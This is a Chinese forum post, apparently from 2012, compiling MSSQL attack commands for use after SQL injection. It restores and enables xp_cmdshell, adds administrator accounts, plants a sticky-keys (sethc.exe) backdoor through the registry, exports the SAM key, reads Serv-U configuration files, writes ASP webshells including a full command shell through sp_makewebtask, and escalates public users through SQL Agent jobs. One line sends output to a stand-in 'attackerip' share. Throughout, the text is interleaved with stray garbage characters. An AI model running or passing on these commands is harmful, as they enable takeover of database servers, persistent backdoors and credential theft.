1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号. n+ y. S1 k2 O0 j: N
恢复方法:查询分离器连接后,9 T' P2 c* W/ ~6 }" r4 M
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
7 s/ v# q0 v- x; R$ p# `第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( v! R" M5 W$ J# }然后按F5键命令执行完毕9 v7 `3 @. q9 z3 t+ Z1 z1 t
+ A/ X; R& U1 X: p! z. @
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
# M4 M, r( a& }8 Q恢复方法:查询分离器连接后, h3 {% y0 g3 \
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
) ], @9 v8 Q& d% ]' u' ^第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
" M3 c: b& D6 r0 X3 ^. f# y6 T5 F) q然后按F5键命令执行完毕& z- o q# K" {
: B4 S9 i6 B$ d- m! s3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
% M- n( N& w+ {) p9 \恢复方法:查询分离器连接后,. }% a; w: u1 H: u2 ]
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
* q5 K: J6 F8 L( r( L0 G$ u第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
+ V+ V/ t/ a0 W8 c4 \% v# l1 I4 A5 V* j然后按F5键命令执行完毕$ t$ Y8 p* U+ T9 w4 }" j
* H1 w& R- _1 ~4 终极方法.
4 [' |2 m4 C0 o, F7 Y如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
( R: P$ t$ V: |7 E. D, S7 B& d% E查询分离器连接后,- N+ G6 {3 e) T0 N
2000servser系统:$ e9 B) R' [- T) `) n* ~
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'6 _! g0 c4 |% H! h
8 G& g$ k6 e- K. u7 s# J8 x' s" O* D
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'2 ]3 g0 k/ w& U
" I' y& R n5 N
xp或2003server系统:5 b: E1 K- l0 C2 P# X7 \6 Z* h' w- P
2 p" Z8 C! W0 M# ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'/ U+ k% V- p$ J6 ^, I9 _: ?2 }
" Z- D' d8 w3 [2 h8 C3 a4 Sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
7 m& u9 F7 c% }( V& K8 n- i/ q3 r/ r' l& n- O9 c4 a, Q9 b0 r8 X! g; I7 w
i1 D9 @' E$ r6 g
五个SHIFT3 a' h% A' @5 [# L3 j& H
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';9 M/ p; G! ^& `# g! t5 i' o9 x" t- ~) @
8 w" z' l8 q8 n' ^6 ydeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
V+ h, q' _: |, F# ^$ Y0 }+ r- h6 |, {( W
xp_cmdshell执行命令另一种方法' X3 Z8 w9 Q/ @ R0 c @ M
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' + x- B+ `* Y2 Y- k9 n9 A2 E A& B& N
( U8 F$ ^) a; m# m3 H6 F判断存储扩展是否存在0 J6 P6 w3 J' X7 ^% I
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
) a! h& N4 e* O+ F; X3 J, [+ Q返回结果为1就OK
8 ]8 O0 L$ r$ ]. H
7 q! r- Q, l2 a7 q# K, G2 M" F0 _* F$ x c: N! M7 q: y0 y4 u
上传xplog70.dll恢复xp_cmdshell语句:
) [4 Z2 f5 G9 @" j5 I- S3 Ssp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'2 x) R, `8 Q. g3 }
* Z5 {/ d, V( X3 z. ]) r# J/ n
否则上传xplog7.0.dll, d9 L, c2 e- ^% U
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'' g M8 l% z( f' n4 I; y; K
( O* c0 o; k* [
) H6 v4 p3 L+ ~7 W1 I1 C: H4 q
, ^+ c0 Y. Y5 T, |: Q# J& s4 A首先开启沙盘模式:
+ g8 e* Q% x2 j7 B2 T5 T3 R1 O0 z0 Yexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
+ Q8 y$ O2 k# ?' W% I5 h5 x
" j( a+ U: U" ?! B {- m% `然后利用jet.oledb执行系统命令, u( ?- W9 l- q* R" a2 ]
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
3 e0 S0 u; z3 m/ w" J ?, L返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了6 P: Y3 l% m; A! S- ]6 x% K; j
/ D+ m9 M0 i2 y) A% b% _: S$ ^( p+ i0 R6 v- Z% ]3 T0 E' Y
3 L* H/ o$ H/ c% [8 u6 ~恢复过程sp_addextendedproc 如下: F# w! z l) z: m' J# `& a
create procedure sp_addextendedproc --- 1996/08/30 20:13 0 [# t' g( O/ V0 |/ X5 J" S
@functname nvarchar(517),/* (owner.)name of function to call */ ) P/ q% @9 X# Z5 b7 {( c
@dllname varchar(255)/* name of DLL containing function */ 9 }5 l% I! X8 k/ N* y
as
/ d" }- T, Y) L; Jset implicit_transactions off 3 C8 I, t' W: U
if @@trancount > 0 - P9 V" V7 z9 q$ z2 W; a7 ~
begin
X! b: [; V/ i n* a4 iraiserror(15002,-1,-1,'sp_addextendedproc')
+ Q5 l/ q( L9 c( i5 y2 U2 w1 Freturn (1) % g3 v' D1 S% J, B. A
end 8 O3 ]0 g8 I, o; O
dbcc addextendedproc( @functname, @dllname)
5 W% r" \' n; Mreturn (0) -- sp_addextendedproc 9 I. y3 x! J. n4 g& y' U
GO 6 n. Z c% z' E/ I
5 H R. S% B" c- L$ x" I4 x/ m
% j* j+ J. |* n; `2 m
" Y$ h: j2 k; J6 {5 t
导出管理员密码文件( a/ o4 e& h6 V+ r" K+ W# p5 W7 |
sa默认可以读sam键.应该。
7 \: C2 k. P0 r$ Ureg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
" s5 ~+ |6 m& X, o+ r1 l0 h+ ~9 Qnet user administrator test
8 `# p( \2 c( {用administrator登陆.
& }4 k. w: X$ Q+ d* p( I! L用完机器后
) d- O/ h' S, Greg import c:\test.reg7 N) x) ~* E% W5 N
根本不用克隆.
* f% q8 E- k' H3 s找到对应的sid. ! r- e5 U- {4 T. R, c
2 ^0 L: q) v+ K5 r, k
0 D0 z1 J, |5 f% w) _% x3 l! X5 U: B" u& x
恢复所有存储过程5 }7 _; T6 l) p, A. c
use master C2 `6 w/ @5 O& o' Z
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
* B% J; v; `( r% Iexec sp_addextendedproc xp_fixeddrives,'xpstar.dll' # h1 w# `4 E8 j# N) I5 b3 H Y
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
0 j; A. e5 W1 i' S0 w* {7 eexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
/ \7 d3 B+ |$ s+ b3 K' U/ }& ?exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' + X0 `5 G; C( G; j$ _ o# b- s
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
+ h5 d, B/ Q# u( L! Y, a: Hexec sp_addextendedproc sp_OADestroy,'odsole70.dll'
Q/ t) W$ \, qexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' 6 A6 C1 Y7 K- {2 V8 r6 |2 W
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
; v% O, q$ J- m9 z9 o4 `+ l" eexec sp_addextendedproc sp_OAMethod,'odsole70.dll' 8 M6 o0 {6 y- S8 H
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
/ e5 ?/ j/ i; bexec sp_addextendedproc sp_OAStop,'odsole70.dll'
& X2 Y/ H( Y' s+ }+ G* f1 vexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' . T1 w7 [# I8 }; ]0 j4 I, p
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' ' l# F( {. t. f4 ?- {: q; w7 }5 k
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
* ]# ?% u( R0 A' \" F0 ]9 b! Y P( hexec sp_addextendedproc xp_regenumvalues,'xpstar.dll' 0 c' r' B7 i" P; k
exec sp_addextendedproc xp_regread,'xpstar.dll'
9 s, V4 G" l( i3 bexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
9 g) S* B4 A0 g R9 ]' ^% X; M$ bexec sp_addextendedproc xp_regwrite,'xpstar.dll'
/ H' f: J" D" e' q7 Oexec sp_addextendedproc xp_availablemedia,'xpstar.dll'
% f5 Z+ x2 e2 {: W- e- w, r. a
) W7 C i2 M/ |2 ~. I7 k1 `4 a" a
建立读文件的存储过程3 k J! H: D/ o
Create proc sp_readTextFile @filename sysname
% h& r6 Y/ `3 R+ q( F+ mas7 L5 n- r4 J3 j1 f
* A) }! J3 R3 b0 O# [8 r begin
9 [ z+ s" y) s set nocount on
$ j4 S1 t. M4 [4 `& E3 M/ S, O$ A! Q Create table #tempfile (line varchar(8000))
$ C" U4 z2 A, L/ u! ~ exec ('bulk insert #tempfile from "' + @filename + '"')$ {9 H) K( i! @" E% x$ m3 k
select * from #tempfile% ]9 D+ Z" F6 t3 Z$ H# F! o
drop table #tempfile0 C! X! z: O, d- Q/ }1 U: ]
End
9 P8 T* p5 u& k- l/ d' D! \% m( O
@4 P- r$ p8 j! E: `exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
$ G/ D1 l- ]- {5 [$ M5 r查看登录用户; L! n4 q* Y( I6 d( p
Select * from sysxlogins9 b1 U U. ~% Q8 z$ D* w! X% t
3 R- w X, J8 U* j0 ^; m
把文件内容读取到表中7 l& S2 F( Y- j" H B5 w! b% A
BULK INSERT tmp from "c:\test.txt" W; S. |0 W0 f' I/ P. I
dElete from 表名 清理表里的内容: }9 D' W" V8 a! Z5 X
create table b_test(fn nvarchar(4000));建一个表,字段为fn+ E' S9 t; H! \' M2 e3 j2 p$ O
8 r$ @! H. R1 Q( H* l
' S& D( M1 A4 Y. ?6 N2 T加sa用户
( A" N$ U8 N9 I% c+ p! x4 I" iexec master.dbo.sp_addlogin user,pass;
~7 n8 Z& ^: ?exec master.dbo.sp_addsrvrolemember user,sysadmin
% W9 i: N8 j8 ~ J+ D+ i5 G4 O) d* d* t' ]7 }7 m4 `+ l b2 `7 ^( t
) ]: e: X6 x; s* i/ B" l0 c; \
! Y7 V8 B& n5 V- d读文件代码
4 z# Q0 t6 u7 v1 s; odeclare @o int, @f int, @t int, @ret int
, J: _4 \9 r2 Y/ bdeclare @line varchar(8000)2 u: _: w6 J& U9 S; K' h! D
exec sp_oacreate 'scripting.filesystemobject', @o out
+ h" k) Q) H `. Jexec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
& P' O. A: n+ @8 |! qexec @ret = sp_oamethod @f, 'readline', @line out
3 |- S+ ~& A* y D$ l7 ^while( @ret = 0 ), O/ {6 l3 I' x" J* k! \
begin5 { D# H6 Q. A7 M f7 U7 C2 m
print @line
+ t W' U- D+ Mexec @ret = sp_oamethod @f, 'readline', @line out7 D" I5 ~: J2 f# o1 A2 Y
end
g6 `/ y2 ^$ w% H7 t
) U# s; ?/ Z: f1 u/ ]0 U' Y0 G
( V4 e1 @5 n$ p4 q" I写文件代码:* E# V& q2 v7 k- o, l
declare @o int, @f int, @t int, @ret int: T# G1 g+ z0 r% n6 n, J! A- {: m
exec sp_oacreate 'scripting.filesystemobject', @o out6 R( J0 C0 @3 X: E, q, D; ~
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1! Q- U3 V5 X3 L1 I% v8 }
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
! _. ~# U& f9 ^% ^ g" p1 Q" C6 `- M, ^1 L' p4 G
3 A7 N/ D; H( j
添加lake2 shell
; Z- a- b) t6 Rsp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
$ H S' y% p- x; C% E0 Psp_dropextendedproc xp_lake2' m/ \ Q7 W `; E( h: Y
EXEC xp_lake2 'net user'
$ P$ a5 B" P* n% ]/ F3 C! D6 t* o0 ^# C$ W T) U" M+ P
6 G( H$ X. z8 \. h得到硬盘文件信息 l) f! U3 M9 K: @1 f0 d) x: D! ?
--参数说明:目录名,目录深度,是否显示文件 / R9 p5 d2 M9 s6 ?; A& J P. s
execute master..xp_dirtree 'c:' 0 V' K* s m1 D" H4 s, K
execute master..xp_dirtree 'c:',1 % e6 A7 m5 e- ~
execute master..xp_dirtree 'c:',1,1 ! [9 h& N0 a# I1 y6 Z: S; d
" m1 m' h0 J R0 o
% o' y! J0 q: L6 R读serv-u配置信息. U6 y7 c n" |/ G8 n2 i
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
& o6 |3 B! b- ?# fexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
5 p6 I/ V3 R2 }! }2 P- A& E ]# ~; Q; f2 G* a
通过xp_regwrite写SHIFT后门, z# E0 F5 o8 o" P1 A
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--* N; ^" o& V) ?6 Z7 q( x
4 b# V) P1 i4 @
; C. {' L: t+ n" b; ]6 O
: \" C) @* `+ O; [3 @
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
" u/ i0 v% @1 i5 ^; r y4 @" Cexec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了- K2 S# S+ e/ \# [6 ?1 R% @
8 R# e, t& H; z; Z+ f
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
7 O5 k! ^& z+ ^& u3 m+ k# O$ b) W4 q+ m
* f3 S# C" @5 n4 `: t
( W, H8 A5 Z9 j2 n+ i0 ksql server 2005下开启xp_cmdshell的办法0 [- t( N2 ~5 p2 B2 u, n* V5 n
" S2 k* ~: m* N) }EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
( X( R8 w J: t% U. }* v
9 V# K/ r/ s# _" I# `3 j, K/ w( gSQL2005开启'OPENROWSET'支持的方法:
8 C' T. ~+ A+ {3 Y; H& q& Q' U8 F* _+ A$ y! n
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;& i# c0 s2 n1 c* t
) j1 N. T1 S. }8 q2 @$ Z8 y
SQL2005开启'sp_oacreate'支持的方法:
! u; C! g" C* R7 W, z, I( a9 Q4 ?7 |* U9 s
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
( }; V6 t; E9 ^) O5 ?
- h6 V8 Y6 p2 c1 u$ o6 E t% h! ?( M* c6 J' r- s6 N! ^
' z# Y( j; c8 K1 e* u
7 e/ X/ s& }% X0 i" Z
! b7 w- F# X3 V( N$ ]7 M& v
8 b. r- q' ^$ T5 N) [( g
9 d: J6 s2 E) o! z7 i) z, p$ |
, P" M# t+ n& i' r+ ^
5 |' k8 `2 T% I, ^5 w* I+ d6 V
2 f: H9 ]$ H- V( l% X
/ }7 e* G' k! ]4 P0 @/ a: c. M+ `9 h, i" j( q; v3 @
) Z4 \& N6 F/ J0 U4 S$ Y/ G* N( ~# }' ~. o
/ }) @! x0 v- }% z+ f \( ?% `8 T4 T7 ` C! x. m
2 D, A/ V/ T* J i
5 Z$ ]1 _# \% w, [$ ^# |7 T
/ ]1 E' [, [& n1 e: P% Z
$ f7 [+ P/ w% x' ~5 H3 @/ @; D2 M7 |/ f g" I
8 E+ w$ j3 b/ {8 c
& \/ D$ a( O9 Y6 }: w n以下方面不知道能不能成功暂且留下研究哈:
9 c& F- n+ C/ P4)
3 B' C( a; o# B" p. V- K2 luse msdb; --这儿不要是master哟# ^, L W i" O2 h6 @) h0 ]& n- F
exec sp_add_job @job_name= czy82 ;6 ?/ {! X) {* \8 N
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;- i/ X0 b d$ z
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;( |3 C9 o' }1 V4 P
exec sp_start_job @job_name= czy82 ;6 V7 I7 z5 u3 Q# b! `
, i8 v! t+ k( F
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以( [8 |7 _( P; |; S
执行tsql语句了.1 w5 i- t7 u- j- J
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名2 O, n5 }2 k* s0 r
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)1 d Y- j3 [/ G4 ]9 J9 V' A
net start SQLSERVERAGENT
4 d) k# B$ o0 O) u; F: M' V; }) j9 ?1 w+ B* u$ x5 Q9 v
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
% g1 y1 L/ b& c) b ?USE msdb
. H7 k9 t+ m9 w; F) m/ B# o2 N- hEXEC sp_add_job @job_name = GetSystemOnSQL ,
9 Q# M- G! m' r: N8 S! N4 i@enabled = 1,
$ _$ N1 e* O1 p8 _@description = This will give a low privileged user access to
! N. o% ~2 `' _! Y4 V' Qxp_cmdshell ,- W7 l$ ?( i b. I9 h
@delete_level = 1- o4 l! \2 R# E I7 H& P
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,& T. t; m* I2 l; Q, \
@step_name = Exec my sql ,- v# h/ M6 H1 Y4 ]
@subsystem = TSQL ,
" P4 K9 r3 p' H2 h@command = exec master..xp_execresultset N select exec& e! I3 Y: x% x9 t- P3 H6 J
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
7 b- F, ]- J$ V- }* G9 PEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,$ K" B% a+ q( k6 ]! n
@server_name = 你的SQL的服务器名 & f: A! t j# l8 P
EXEC sp_start_job @job_name = GetSystemOnSQL : [' h3 E K* x: d
* R$ ]- a* T* N4 a, [* l. [0 U0 H
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
5 m7 ]) c+ b- V+ Y$ l5 O- @才让我们可以以public执行xp_cmdshell) a9 s8 g& u: J( s: G; }: @
7 y, V* \& ]/ e! o: ?! Q5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)6 z$ z8 E% l" s+ [( }4 a. |6 M+ C
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
& L7 ]+ ~- j% s% D) b2 V
' v: q9 q9 J4 b( B/ R+ e9 ~USE msdb
) @3 m2 S+ |3 L* K+ s" wEXEC sp_add_job @job_name = ArbitraryFilecreate ,
9 o# y% W* V8 F* Y2 j/ @8 v5 }7 T@enabled = 1,
2 i4 i* A+ ?1 l0 T7 i4 K@description = This will create a file called c:\sqlafc123.txt ,
) `# R; T7 q1 L# f! ?( K@delete_level = 1' _4 N6 u8 o2 J) u: T! q
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,6 [" ~3 M5 P. m5 A( z5 B
@step_name = SQLAFC ,, ~# A" [$ A& N: f* o p: O/ u, X
@subsystem = TSQL ,: F# y& Y2 Q" q1 q& _* O, R1 [
@command = select hello, this file was created by the SQL Agent. ,9 o5 s. q0 J+ C# G/ z9 T/ ` C
@output_file_name = c:\sqlafc123.txt
- U4 q9 `) A9 q# p# {EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
% [# O0 _1 a# U- I8 L! P@server_name = SERVER_NAME . F+ G \4 O) \, m
EXEC sp_start_job @job_name = ArbitraryFilecreate ! f' k! f; i% d6 w' L
5 t8 H0 q+ U" c3 S4 s8 U如果subsystem选的是:tsql,在生成的文件的头部有如下内容
8 Z5 S j4 Y$ E/ f) L7 z1 F" _
. d' Q3 Q1 H5 \* u7 p??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19* }/ B) E2 _6 O7 z- P
----------------------------------------------- I5 i6 h' k9 z0 K" q
hello, this file was created by the SQL Agent.& z) ^; b" {8 N# W, g2 s' F. s8 a
}1 {+ O/ v( |+ ]" q" x2 S# ](1 ?????)
: P& _: Q2 L$ L5 v0 i8 }* [; y& f8 p$ \' u. i, g* O
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员- r2 {* ~# c: s7 |8 U8 P
命令的vbs文件到启动目录!6 P) u' N- Q* Y' |8 W
+ v- ]# i! _; {6)关于sp_makewebtask(可以写任意内容任意文件名的文件)/ _$ M: @( B# `+ h$ _
关于sp_MScopyscriptfile 看下面的例子1 W: Z+ |" s; ?1 ~
declare @command varchar(100)
: t$ c, D6 R& m# ]declare @scripfile varchar(200)
8 f3 I- l5 ]) f( k' B% fset concat_null_yields_null off
) H4 G" n4 U" x5 t" |: Iselect @command= dir c:\ > "\\attackerip\share\dir.txt" 2 N* z& q4 ?- n8 e2 L$ V T
select @scripfile= c:\autoexec.bat > nul" | @command | rd "
# h. \* j7 _% eexec sp_MScopyscriptfile @scripfile ,
, L/ \ p9 ^5 P; K: q6 A. @1 J
1 h. I4 j4 N6 K! q. ~. g这两个东东都还在测试试哟
W" s$ T& r n0 B# v5 \. W让MSSQL的public用户得到一个本机的web shell
; b6 C% p B \ U2 N# w* O/ s/ e* y3 P# f
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
4 z/ Q5 e" s3 w( `( k. s--@query= select <img src=vbscript:msgbox(now())>
& y1 E6 {/ ~: d& y" T--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> , L4 G8 `3 J" H! s3 `/ F2 h
@query= select
2 A- R0 c5 D$ g! L ]4 T0 [5 g<%On Error Resume Next + Q3 Q+ f2 z! F( L) D M" D
Set oscript = Server.createObject("wscript.SHELL") 3 m: `7 Q' l" ? h! X: j5 P! S- X& _
Set oscriptNet = Server.createObject("wscript.NETWORK") ! {$ J+ y7 A4 P2 v/ q8 Q& q2 _* l
Set oFileSys = Server.createObject("scripting.FileSystemObject") , W6 J5 B& g1 ?: ?$ C5 K( o5 g
szCMD = Request.Form(".CMD") : a$ N6 h: Z; I6 ~! H- s: Q7 T
If (szCMD <>"")Then ) h7 b* s/ c0 Q7 I. z% b
szTempFile = "C:\" & oFileSys.GetTempName() & @% s! k. @5 p( B! K4 [
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 7 W- ?4 d5 m2 }
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) % k, _; n. r$ m# h3 @2 q7 V4 V
End If %> + b* |- G: W& R9 @8 e
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
& G: X% u7 S. y" Y0 l<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> , p; V$ |% h/ [% {* P3 s6 s; K9 F
</FORM><RE>
3 I1 g8 a) Y, M6 w! }8 ?<% If (IsObject(oFile))Then " E3 s1 I" d* V
On Error Resume Next # ?6 `6 T8 Z. _- q" O" A' E6 z
Response.Write Server.HTMLEncode(oFile.ReadAll)
/ f* \! m6 M) m* n* o, A S' j( BoFile.Close - J W6 H/ r5 p% g$ K1 u r
Call oFileSys.deleteFile(szTempFile, True)
, a8 L2 y3 }! `% QEnd If%>
; x& D6 w8 A) w# R</BODY></HTML>
1 Q# T6 _9 V7 W1 i1 C |
发表于 2012-9-15 14:37:30
收藏
支持
反对